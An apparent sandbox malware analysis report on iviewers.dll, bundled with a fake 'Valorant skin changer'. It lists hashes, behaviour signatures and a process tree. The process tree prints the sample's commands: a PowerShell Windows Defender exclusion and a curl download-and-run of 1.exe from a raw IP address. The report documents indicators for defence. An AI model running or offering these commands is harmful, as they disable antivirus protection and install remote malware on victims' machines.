Analysis
-
max time kernel
121s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02/03/2025, 07:26
Static task
static1
Behavioral task
behavioral1
Sample
Valorant_Skin_Changer.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral2
Sample
iviewers.dll
Resource
win7-20240903-en
General
-
Target
iviewers.dll
-
Size
83KB
-
MD5
55470aea5b9f0cfc5af1bb312638cf47
-
SHA1
c9b7d95b45fe7f3282d4e76796c66f9c050961b7
-
SHA256
0e1eed48e5643a9090e8f55f741ae9c322ec9b8fb3c6f6d902a9d977762ec0b5
-
SHA512
ee001e521670500a645dcff5141d73aafd864c82b4ebb0e4c9f7975e1e25124d92bfa6dc9b6170b1d018697672116920d428e629b66b3cfbeecf93933ef2ef4d
-
SSDEEP
1536:obo5eK+wzZQ1LRC7ivPv8ZqTfXeqvz+NBGQS18sWpcdVQCLHWeDCf7/P/:os5tXVQLRC7iv4qTvcGQS1VQCjWeDCfb
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2320 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2320 powershell.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 1548 wrote to memory of 2128 1548 regsvr32.exe 31 PID 2128 wrote to memory of 1792 2128 regsvr32.exe 32 PID 2128 wrote to memory of 1792 2128 regsvr32.exe 32 PID 2128 wrote to memory of 1792 2128 regsvr32.exe 32 PID 2128 wrote to memory of 1792 2128 regsvr32.exe 32 PID 1792 wrote to memory of 2320 1792 cmd.exe 34 PID 1792 wrote to memory of 2320 1792 cmd.exe 34 PID 1792 wrote to memory of 2320 1792 cmd.exe 34 PID 1792 wrote to memory of 2320 1792 cmd.exe 34 PID 2128 wrote to memory of 2680 2128 regsvr32.exe 35 PID 2128 wrote to memory of 2680 2128 regsvr32.exe 35 PID 2128 wrote to memory of 2680 2128 regsvr32.exe 35 PID 2128 wrote to memory of 2680 2128 regsvr32.exe 35
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe3⤵
- System Location Discovery: System Language Discovery
PID:2680
-
-